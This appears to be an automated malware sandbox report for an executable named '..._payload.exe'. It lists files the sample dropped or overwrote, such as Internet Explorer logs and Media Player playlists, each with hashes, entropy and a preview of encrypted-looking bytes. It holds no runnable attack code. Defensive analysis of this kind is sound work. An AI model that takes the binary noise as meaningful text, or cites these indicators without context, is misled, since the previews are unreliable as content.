                                                                                                                          Preview:<?xml..~v.l......V].3.)&.Le.....#....J..7Z...<x4.04.[..S......k......F.%......JH.).{\IA.,./1Z$..,...$t$....8.....6H.9.+.....e.M..6.......@.S.v+...K4.N......_..fqI.V9...5....A@.*..f.....':%{...h..%0.....hY.g..b.a..z.N{..L...Uge....)9..P....;.....T...w@.8....-.`.p4...l...9]...r..f..N...)>..t(4>...).3}....s..A.uL@..q.......8c.."q..... .0....d..Uo..t.#I.....-;..L....gM.`.../@...7#Y....'...%.F.v.K.9E2..>.u./.9&..^.U?..=.h2.*6^.3.mJ.p...g..>..0.w..*.....7'..e+A2.}..a.{.......U.0.N2.`.W..q.QA....|s[...C.0.l.E..X1M......0...m..H.=....aMR..x0...x(..X:..&.....:...>....X..i..xv..).u..V{s.-.`...1.dZ*.@4.q..K.........<.u>...&.X.........'....+..J..*x..+...b...8}\e... ..kJA.1{nl.V..|....]X.Q.r..;j..U.5..n..Bt..l.......M?.;.J......3..2t.tB....Tj&....u1.h.8.@..$J...}.C...zWR:X3..r.^................$...[o..... /`..p.\ktpo.N............[\ec.a.f.c..."..8....0).5.(O^......gA...A.g..QRn^...^...28A.5...U.4.D.p.......$.f.("5m..}W...Q....X...O.zw...S..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6906
                                                                                                                          Entropy (8bit):7.976256345082364
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ICXt0hgesW8W8nI/WqjEdBQMU6DwHT4p1v4:/tggnW8KwQMU6D71w
                                                                                                                          MD5:87B6ED9421660E1A36C33A7E19ADB000
                                                                                                                          SHA1:ED20778D89CCCF77338E8714DC1B5569DAC13D77
                                                                                                                          SHA-256:D41F0AE14A57643C579DE453AE7768C3234685E3C31058D9CB6C84570B670287
                                                                                                                          SHA-512:220493DF46DB83CA4CACC639618EC1CBE205AEC0F8C2FF418E1609EBCFBCEF3585B693ECC45E45BC4225C6F05DFEAE316F2DFF84F49C3988D8AC6DE61B4D5C67
                                                                                                                          Malicious:false
                                                                                                                          Preview:10/03..IB...*.!......$K*.i......W.>lh.O....1.../U....3....UJ.ni.......`^..&.7..Z._%.=..W.r'.U......l].9D.K.i......oY.S.kB..5r....>3.;.'....[...E.\e..I..Z9.U.'.a..8....[..N.Y^.O3...N.].n.6(......V2.X....N{h|..7#.%.m;..T...-.7h.v ...7...u.......S....{z./..REu.).{d0A._...t.!,G.M.....M.Y.ye........4L..z.......S.......T...i[).=N..2.s)>....Vmf.\Nu...E.2..r...;....+.I.%.....V...[_.&....S.u&....._x.......|..T......@.w^8.f........V.....,4...\..4....)..h.y...q.C.R....L.S.....[.,kG..-.X!..5..3..\sQ...f.....:]4.......X.Q^....H......k.A.%] .B.X..........M.d....#q..)D.N...\4R......P>.....,4...........T.....y;.U...{.u..*.U.C...N...R%|......1..s!.)...F...Lh..-(.?Xs..6:..ts..8..7.+..v.}Qs`?..._3.9?a.N.SP..k.N...>.d...3.0".....7...G|.X~.r..^..q.[{@2..8.o.mn.2.Y2.`B...%7.m*.#..1b.E......K.._->............}@i.=....f.)i..._..8.l..D.2.C..s...f.j...n..'x...... .~w`.bc.d.u.G....F.P...vK......]4..........$.....{r.....k0..l.....@.......*...y

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):834
                                                                                                                          Entropy (8bit):7.765044808608182
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:Q9CIk5LJe5VdUy9Bw8T6f2fhRO2f8ml1A69BBI1BtiHte8ygDZ+h4Bn4ndq5bTcq:Q9CHVuVCcBw8Hhl2697UqQLITbD
                                                                                                                          MD5:1ED50E50B210C25B61250AC1E3B0FB31
                                                                                                                          SHA1:29FDE77E3E351B1ED642A380FA19201EC86AB591
                                                                                                                          SHA-256:13DEF9E5598DD91BCB0D4265EC0E055383812EFF6B300F0371170D50E3B5B6B2
                                                                                                                          SHA-512:16ACB0BE2E7DE8250F0F2677BCFE3D54F8812AC9F1DDBD46D47823288190C71BF702A2BAD1DA32C8D489A9D4424E98478F14E99FC109FA73D0E06721F6A19ECD
                                                                                                                          Malicious:false
                                                                                                                          Preview:..1.09..N91..Y0.w.a..~:s.\O.... ....0..5......6.4G.J......H.i....^.f}'.{.. ....6Yu..7..+>....L.H....}."|4k;.%.|...q...F......E.s..8x.n.....s|.....3.4..g_f.Y.....g..u...\...;Z......&.o.F.8..0Q>....O.{.W.`....W..$....w.w.).f...k...8.:..;...2P.N.(.3!2.<I..R.Vd....jx...e#.D.E.%..e..........R)..w....o..q.sB.B4w+...]X.~./.....f..../......s..b..u.9..&..o.\) ....L$l..&'..L9'z..$.[k7...<....I.F.=]<..Ldd....{..n.....(..P.G...E..;...{./.....%"X"..H..#.c|..ee.I...l;.^..c..F..+.5+`.."......v%0q/o.0.y:&.......X.?.._=.2".......%.8..a)..7T.H}.w........^..;..i..O.41Q.U..o..V.....P.*b.......7._8...An..E..Z>.....*..W...........G.$.0...$-],(.j<<..GQu.o.D%J.c.c.m..~j......&.>..a...v.q.n....u..[.....qr.K....|...+#.E.[.m...phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1740
                                                                                                                          Entropy (8bit):7.874624558264791
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:IjBTHpDeY7nToD0ndH2t9xDstPthW+YjaF8DSD:IjBTHpD/7EDSdH2R0W+h8D6
                                                                                                                          MD5:B037E4EE7C4F70730DDF9A611FBB3642
                                                                                                                          SHA1:FD1EDDC5350E33910C84890612ED2FC816E4A773
                                                                                                                          SHA-256:436BAF779385C62CD6252D1665F851CD9B0FA6EE6ABE62BDF81778AD995167B9
                                                                                                                          SHA-512:83CA43C3793B287D00E84E19AAE01F843FFB6AEB3076343D73AF6D9CD358576234F286915E702FF832EFC8D56C701D397D2ECB39007232E7FA2032EEFBCB935F
                                                                                                                          Malicious:false
                                                                                                                          Preview:..1.0.I..8..,.'...o.MJ.&.x..+..(=..~.}...={.D......=..@.+.s.L.q4.U.'\..k*C..;.!.5. GV..&#..UP.,.r.WG.f!...`...:.m.Y+....V..b...9.SY<.f...S.sz..x.R...g.7....F........%+...&L.Q.?L.@.........FC.. F....-....*z9.....ns.~.`...1..,{.E....Q..;N...v...(.7 ......r..r.M..."p'...O.#y.......o.[b....._3.. .Pau".O..h.j@.2.)...=..bA.}n..p.@..g.n..."..E.f..xr.d.a..F(..vWk.[..... u.4'....\..@.[..(b.^e..N.6ju..*.:.8=...jZz..{..p.G...L5f*..V...@..sO.%.......A.4..@IL]b..T\..d....:....q.....^+t....w.-He/p...YF.E.!.X....A.M.z..(.>..5........<......h.Z*..h.|tC.....k.2.:.'..b.@..W.(r......a......?..?.T..f#L.....w>;`|i...%U:1....>/...d.....O..u..A....:uL..k.".`J.../>.5.$s{......4.I.}.Ms...Dt.-.88xSSgG?.......2.g9J|.b.....5.ez......26.....k.M..hf!.t.X#.a....V....=.R.....9...........wX..\..".\.PU.Z.XZ?.dP...R...S~9........wI.D-iU. ..).....6...XL..0.nV.H.L..(E.j..W5...X}..6.......*.).0KG^.KE`...[u......U.........0.T.^.K..L.GSw.;......U.....9.%H..............VUF.6

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\01_Music_auto_rated_at_5_stars.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1378
                                                                                                                          Entropy (8bit):7.854853244338846
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:7hDzNbwUOj2hWGmZNmrSW+qxcNK8Hs8oIuCJa8sv6M4S17cye7OqltYebD:7hDzNbwU+ZrUS1NK8HsBjR1SOql+cD
                                                                                                                          MD5:0ABD586B488E78253C5C4E29FA7DF6C6
                                                                                                                          SHA1:156D668405C901FEBD9B50821C3628FCA373518D
                                                                                                                          SHA-256:C88EA571F86B90DD4460C4107496DE65303C3BAFBADB1F234F1A0ED557627FDD
                                                                                                                          SHA-512:074E302946A187306C736AC940A47EE588B2468C87426CBC94E2E3691E642FE92FC8C540F7857B97A5CAF22640EE781038DC0CACEAE12E94C12C057F00F23D4F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl.@.....47...B..i.84.}.D....,'..V...Y....z!!..xwW.q.........y-.Tk...3.#..4h...N......\.....%..R..0....|0......)..?.X.d$..."..q....Z.5.<_W.W....q.+.Z...%!."..9Uo.^..Iz......'.N!H...F. .h.T..Z.o.x..62E....y...;....b._.t...Z.(..P..|.xv.P/C...|......df....$tl...|..f..._......5....J...H....,.@ee....n;..)K...39|......q../#.(4.y.W........U6W.26.."s.2j....-...K..."...Q...=I...D.~.n.ew^.......7..lg..xM.De.hRwt..'$$...2=.....p......bx../.j..M....!kp...$..o..R.T.7.T.e.g......."....~..Y.).i.n?,-..6..7\n.Z.......<..b.].....t.[....O....v.vi..s$9U.{P..L..z.:.3..P*..cA..n.V..V8.8....]tu.........HSY..y.....N..N.....?JG.....h+`.w8....".Z8....U..V...F....N...$.^4.N.hZF.[.:p.f.).c8....uZ.!.^.%..o.....q.'|+0.....6nYo...0...s-Q.T.....E...m;.....2@{.+..Yk.d...P..T.E......7..;..2Z.9.X.....7.p..D.v...U...V..'.J...pH..E...%..R..\...YH...0...CcU..1%Ta...f\?..m......G...h3..1u....e\.....E/.6..}...MMrM.-&...~..V........cyH?.7/....D1.|q....*.....o..2.c...*

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\02_Music_added_in_the_last_month.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1613
                                                                                                                          Entropy (8bit):7.883272697647514
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2b7+fJpgQcZ+U5H+pJRosUq9J3fZ1/jMnfIUD:k78c4UQpJRosUqbBhj6IA
                                                                                                                          MD5:A62273F015F28BF85A7852D2B25E77F1
                                                                                                                          SHA1:2AEEB64245C966598E30CA302D013F4732679DD0
                                                                                                                          SHA-256:E1AD5334C4DC3C63297E9BE5B7BA52F805A27782AF17E919B199F95B962FEFE4
                                                                                                                          SHA-512:F61343347C8534B00C2DFAB5AD8D8DC136D6F1B7BD308ACDE296A8FD1431D31921AA23D449F61E1006DCD9E9614947C47610256F747ABBE76320996265278C1C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl..G...#e... .T....Q.,7Qv...kA.mU.(.../a...<.k.oj...(S.`.....40......."u.%..^.f..p..]..Y....e%..J\.k..|.2..h..k....d.8<.A...OR......2....E........D..&...F...../.n_8-.c..'.Q}.lU...j.q.D}&...X...\...2.<.Z*.....i..'g.T|U.J.K..U....W.|t6 ......-..?|1....1..D..........q&.e..y..I.8D#9...!.E.)...C.Vj..C.u.=a.....X..Re..I,.(..A"..........u..qo.F.Dy-3..K/&.#.x..\....%.i 'U....Ov*...M.q......C..xJr......uNPo...-..?X)......AKx..6}7F{a|.....k..1Rf...F.....fF.....g.ps`./L`..0._.q..M.k."%...+O........K..y........'6.k.l.6v....d.'.|.S...&Z+..K&.B..@j.}XGAk..\...h.....01.o0..^..q.........%..,.....@... U.&.4....iR~.g..:.^./..*]....L...V..e>.4|.......n@..S.z.....a..$.."1.....Nq.=e!V..?......x..m..Y.|S.{].w....B.R...v....d.!....d..)..-.<s..._...& .M(...G.3(.].M......KZ..#..T.......m.W.o.....@..Q.VS!.............G=...p.l,|..)./}...i...5..#...4xu..}....f.$V.>z6.O}3IC.'....b.}.+.d....Y.C...Z..._.c....J..E...0....q...'.l......K(..%j.d.U.o9r.r.M..6Qy....x.$z1...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\03_Music_rated_at_4_or_5_stars.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1601
                                                                                                                          Entropy (8bit):7.890298821172731
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:uFeociWGTC6wWSndSwQkWN9SwiASUsaMD:uFeocdG26GdSwONQnAJsb
                                                                                                                          MD5:B6806F46E54190B04BE23527B9F578AC
                                                                                                                          SHA1:A7BC01DA22024094D2DC978660C7AD7FB13EF1ED
                                                                                                                          SHA-256:A2F0D9C9638AAE44F78ACB02F9661E8557EE74D726E3DE0FBADDD1D78DF37EA9
                                                                                                                          SHA-512:1C82E252FBC0CFA9E9063C03C763504BFF13433F26E3D183C7FA3D04CC136307E80E8C96B3906FD9B9E671EBDA97DCB4BC097CDAFEAC76E2FDEA9E59375B7F1B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl..o..|.......h..E...%.t...n..}.p..~.l..|......9..C;...=.__...<^2x..j.._..J......v....x.{..F....^.,.p.%u.!.H..e........X...<..lY^.`Y....1.....Z..j*..&....T..p.'.l..W.`.."+P2=.."....G...f...i....Kt..%...E.q...%..}..&............)#..(..gF8...-O<kF.'.RP...%..}>Y...r.).qf...n.|..d..u>...b......s~x2...P.G....r..j....c.G..9=...V..|.%..S.Z...h...d..xB....(....p`.V-.3*.,L.<.=b.....1..M.(.n..Z..3.u.2,(s.j..."..Z-b.....i..z..='.}...^....}....|....6....y=..v.p.*..Cs0Q ..@....0.r)....B)..n......T.<....r...Z..{....I.@Rvt....[O.F..y..\.....w*d.C.e.......c.i...wb.o.g.>~.s)<.....W...S....1N!..c......e....k=..Lm%....Z&......9M"...g_..2...@........?.....y.f.[;*.|%k...v...Oy.?...P)..am...........,E..d@c8...L.lC....M./..n.. +.A.f.0M...r.{.(.W...-...1\{...y..vu>.2..l...8.].7ei.}$ m...4..Q.....I~.s...y|...!...;AZA..(.t&BL....n)4N..%.gS.....*.N.I.......)..4Nm`*W..E1...........i..$.r....1...h.41YC..}.*q...%e.d.lF.uvd.....P.......)...$6.X3

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\04_Music_played_in_the_last_month.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1618
                                                                                                                          Entropy (8bit):7.8833388609444155
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:+XTCWbjBwIZHA4OSlU2BmcJO/+laXqS/UD:qB1Z57lU2BPo/+la6d
                                                                                                                          MD5:AC194C56EDF75634EFCE31E8BCC8C66F
                                                                                                                          SHA1:E98D7604CB211F908F0DB216C673503C2DCBEEC8
                                                                                                                          SHA-256:EC0AFF1A88C802A1923572976BBD35F208566FCA8F096A90E5D97D0863FD338A
                                                                                                                          SHA-512:3BE50854C8785E30F58ACABB75EB604B72C036C01AEDBEDE705DBBBBB8DE69B1D9EE6CD1A56694F46F305BE071B3C72E54A4DC19E6EB32C6822716F55B286B62
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl.(..X.T.[o.B..!.%j!=.d=._..-..G..6#m.....<..Z..Grb{R......&.'....M.RB-........we...}.1....R...F.....;X.P....j.hB..K....!...C...n.KY(.9...j..K ......qJNd.d..%.YVU..TXr,..<....Oz..aw_...$.n..+.S....{n6.!lS...,8.......?7..a..*.8A.....v\../...c.#.Ou...HfIf?L.$(.~ ^H9....I...))...e...v... ......o...8D...hp..3...3Y.......k.).o.~.}..kI.....3h.3......w.%....#G7..M........[.tr...P..r..v4.Y...X]....~%X.I.../..y.pw..'.j..j....~bD.nS.nV+.p....e...[rY.8...T...L.:..Z...@...Z.Z..=:xx.<3. w.w..{V..!UpU/..FS..:.|.6...|*|G(9.I+.2_...-..`.v.H..1#..4T....E......q..5.G.d........1..N..../y..s..K...L./...mH.yK...z.P.....{......_!..F..,.......}{rd.q[XtR./<.?.../.a.sIw...o.*.|....K.H).P.ld...-.'f..n...h.....?)....0$.....U.'..<..]..!.....fGF...M.}.s..G..z......1...7...!,r)...HJ....aBD...G0..x..5.y.4X..[.i.Na.,..0....:4.w...]..m.+o.g..V.;.....mg..d0.....J%@.~..m\L...9...H.o.....L..V:pj.....2?.8...pd.RJ...]...P5.suZ.B~.QU..l.~....Ot)P.q.(...[3....[QA....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\05_Pictures_taken_in_the_last_month.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1131
                                                                                                                          Entropy (8bit):7.823134389658825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:VZcarja7C4YHRarGlz+rPN9GOiCXadUCG3e/69dkQeGbD:V3a7CJHRkxGU4B/6/ND
                                                                                                                          MD5:84C649274568E53F7BBD44BE27FC2958
                                                                                                                          SHA1:7BCEBC398DEEF909CFD76441DFB96495466BB161
                                                                                                                          SHA-256:A95950914388B883C3727C2AC787E1674D4464C1DA461160354605AEA3D672D5
                                                                                                                          SHA-512:0B2EC48E669498CBCA0EF9671194CC7AE6B769A333ED5965F6B98B1A31D771256A41C8A355D5ABABD8316BED86C27F0E7949B0C88375088D749E1D7DCAAB9B99
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl.3..7....$..2.OF9P.Eg>......{M...qd.]]..P..$......^..r."....O.U.8...S...@.x.'t......d..K.>)s....y...<S.k.+u.-.8.sj5...D....N..3.y.{?.......Q...n..1$r.^....nN...Vl..I[..y...J!...c.~.u.&..!..P.L.....}'O.b.#.l..L..e.!.....b!i.2N.M..\.Op...v!.'...bI.......$..wy|z......0".. .8VEb..)F..W`..C8hN$..(..i..u..G.XD9x..g..U{zV<...[.........._`...m....!..*...g.J...N..#Oa.Y....k...ti..Fjt.....+03_..p...Vzz...".....$....%.%*#.4........3.....6..ep..."....+A.Q.J`......x....V..u... .J..m.-d..S..{..._.%.....Hh........Ax...cf..W....<...#..w^.......,......N.R..<ee.D.<.D%.Y....l....E.b1.R*.M...l.O/%.V..}.!#.$@s..b721......{.......p....(.1=.E..u...y....G.... 2..h......H.c.@lz.K..y1*.R.$.......g...`./.?...`...6,.B.u..Up`.0.E......>.]O5.n..v.z..[.(.hN;r..5D..KmS.m.d.....\|K.a...Dv......./.........f.....V..Q......z .dB.[4Aq.5#.1%........<9..VLK.Y..nBr8..'.tm..CM.....z1......_3...R.C.#O..?......x_......h?.....i.f<Q6.i|B..V....R>.w.[.{;.....'g+.H. ..-.....t.P...m.l..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\06_Pictures_rated_4_or_5_stars.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1119
                                                                                                                          Entropy (8bit):7.808360658683467
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:loF2zLdiNGe1U93kETI45QdmWGKisHdvwVLU+jUW9XMmUHXMbD:3/q1U90ETvi6KPfYcJ3GD
                                                                                                                          MD5:2E00804ECBC325E673F23274B4A009CD
                                                                                                                          SHA1:6AD14391E1AF8B7EBDC78E43D0F2FFF15EB55B6D
                                                                                                                          SHA-256:59147AA73675097BF738E954BCA13FBF071A6F0D6D8F8968CFC4461C6A7B8616
                                                                                                                          SHA-512:B188B68A8666DB25114E3D4F7F3E48EB86866E06C07F9D939E154CDA2FAFBDC3FFF1C43ABC0628D50BD53490BCE5987A624847399233F84AF315D4405F745219
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl.....\sx..+..........V.v.\co.m2.....7.W....B....""(.....&.b. N..~...,/d.......(....q....f.!J.b@...[.......=..D..2. $......v`.....i...6.^x.DMW..wP..Xr.S...6......'k..'C..u_..t...S\Xh/l.C.....otS..&p....|..."~....!.5e.........6.....(...v=-..9........p..4.W.....tk0J...^..*).2.H."J'.i.]....JJ..z...4....=S]..~...-.K.>....B...k...t.=.......xn.....Wi#.c.vW....g._...|..a.4xbA...l3...l0....Z%.!..P..j....Z%..g.H.X>..hH.J.upv.#.i>-7e=[2=.=P"6].|..>i..........J:.c=.e....OL..Qi..>..\.W...4.^.\.<.B.6-.x...D.9]..;..G..z)...A.....-k.H..|&...M.C.G.,.......1.nA-..b......=./.K..}..........l..a..a...d.;.1...owA;.RPe..WM...e....-...t.%.g.....j....R).q7/V.%P.<...`...E.J.jjS...u^.{L.Q....U.N..A...._.....Yg.T...n.5..\.pO..s.rK....,...Y......Z..Bg.Q..+..".<.*....+.i|.hQd.'.-Z.......X 8.........J.i6.^..#..Zm...x5E~..L.&..6K.....Y.....[.M4.f...f.]..C.].l/.L~(^`....o\...N...R]Z.Ar...4....{..]..CG.1.?...TE,.gX......./T%.mS....j....A.n..9........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\07_TV_recorded_in_the_last_week.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1374
                                                                                                                          Entropy (8bit):7.832069144648056
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iZlnO/kmqtmEH8rPpWVU62tfzEr43TREOH6zeHareY/K5XpqWlCUCwbD:iZpOsVPHuF62Jc01XDYiGWl4qD
                                                                                                                          MD5:DABB48585E7060D7F49181AEB075B985
                                                                                                                          SHA1:2288D1E2F11B27A252709948EF5CC12D82D8B986
                                                                                                                          SHA-256:1577A39D6445B3C99260A9736BAAB0EDC4037DFD3DD58E19CEC3D57FCC640594
                                                                                                                          SHA-512:99547E82FFAE8097F7BEBB88359B7AB9F947AB98F68351FB5B2C6F358B03320D4FFDAAF237C1C12C41DF5B43A369EDB1411E53B9E8277666248BA167E02FC51E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl..o..O.w.....X..V..B..m.ve./..\....J.P\N.}0.#.o.wy..B....vlF.vB..99eU.Y3dnWI?N.}..3.VSC.y.....O....p.....{_ ..)v.* ...!.^.T&D...MO^I.ld...^.^.T../.T..%..*.....ym....G.~..'.6.N.'..`Ca.r........"3k.U.....4..>.@..E.M-Kw..H..1.....x......*.:..P...%..Lx10Z.g<..gQl4H...p.7....-....p....}Y..]. .J&ki...$....!{5X../.a.....h...H..M.7to....z.o..lv.W.*....k.=.EX1g.%..,o....Kf...N\...C.......X...........M.Y.vS..b.@.}6/......0...VA.B.zFnz....al..Z..1...!..Q.ZsQ#.PI....._..3/uu.TfAjn......J..;.......ZdZ.X...+V..y...[@..|>F....{..d.@.s..n-..".n.=.#.Qgp..l..Y7...2...s.tk0m^c......#.[..|.fa.21..{..v'..l.Y~.6.4../I.....O.3..t..N.,5....=.v..1..6Fh..1#!.C`3.:\..F+p.... /.G&Nq8.x..g.....(a.Da....A..(IX..........9yA....l....~..Z6...mU.......}^l..i...-9DC......v".D....]8.Fz..4....#F...w^..%KM.'N..m..E.e.>..x.....-L..._3 .....}...G.V.7.9...).d.)/.P....^....+.JO.r.a.:?.u.9..xS[%<~7zG..........-<.&....PhH_.......H'.>P6i......F..t..a...+/..-...4..r...oz.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\08_Video_rated_at_4_or_5_stars.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1354
                                                                                                                          Entropy (8bit):7.855386898094005
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:6kGyyOltxP/qZSQYmSYOTquMJIQyBscvxB+3Lljmduuy4VSh6YxdbD:67LuxPyZtvOaJIQyBscpWjmzQdD
                                                                                                                          MD5:DB0F62D622F0D9ADFC5188CB9046B17E
                                                                                                                          SHA1:E0764BDB1C512D53F492820D2487E04669A0D91A
                                                                                                                          SHA-256:49BAEE06FD7E0EF2EB5821277A80C24E66BDEE0F4E55D73E1FA167BCB1178303
                                                                                                                          SHA-512:4D07BC46830350234CCCF728F0352D40BF58E2792D23C19FD01E36016AE93AC5EABD9156EB0E942A62BF2C2D43D3882681B887F9C4545D97734EA4DB66B1604F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?wpl....+.Q.>...i........#.h..*Z..0..V...S...paZ..S5E....IUy.OLC...9..L....Ay....^n.s.../.4.......t.J.."|..d.....$h......+..RU9UX.... ..... .....`...?..&..d..41..s..h.....)V.Q9...k;|..o.....^7.)..y).(.W...}`j..{...... .2......E.).../.....^.8r(...g..)0.<..PR#..`q..}`.}.{<:....}.0...r...$2.../.Y.h......d...#W.....V..a.......C..t%....5G.......O?0..n../.seGW..Suh..U;/....c..f./3......[..]Y.R....hP..B...v.V.Z.zo.....?.L.?Q.p2.N.`.....'y..|..........a>.bb2..%..g..?...VC8.6..5_....O.s(.*...^s....~.H.OG.s}X....O6i...M...I.DE... _....Gb........>.C7.(.n..wU.....8.'..&..`W.....nk....n.W.L...p..P:..f....reN....H..a..l...D._.&.p'cnr.Vx..ILl}.M...Y....&..d..H]....`.'..zQ....nt.....$."............X..}.5..*jGU.6.wP...a..7..o.^..P.....4.....#...x .....{i....?..kC^>.~!...I....@.....O=...q....@....'7p.5..+..hL...l)..c......h.#.>..PN...]&..q,...s...dTv..`..5.%.".Q0s=D\D.zS?...v.N)&.....,2V.X.).b."../....(}W..V.S.e.K>.Jj).)M.6.*...<.h..J..7I..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\002370B1\09_Music_played_the_most.wpl

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1359
                                                                                                                          Entropy (8bit):7.844349644430107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FWBtgpqdeHJY35QmhzEoYWrK7ex9UAmnwr/tuOaedM76Ii9SXDbK+DGDSmf7ubD:QgMAJOpMU9UlniFX66IxTO+oSmf7MD
                                                                                                                          MD5:EC411C96A4782C8CE15C3E71EF501319
                                                                                                                          SHA1:5C6294BA29FD4481791E6A1003056D95A36D71F0
                                                                                                                          SHA-256:11C517B2C1A7A27D1D444A24AECAB4F6EA0CFA50CAE39E45244483D3672984E7
                                                                                                                          SHA-512:F55145730CDAF98D4B64863832AC8B836BA1D1BA47F34D7246E2A48E51497F5682055B8FEB118A5E6F5B60186D3861A2974820E74244F5F15970DE242459DA37
                                                                                                                          Malicious:false
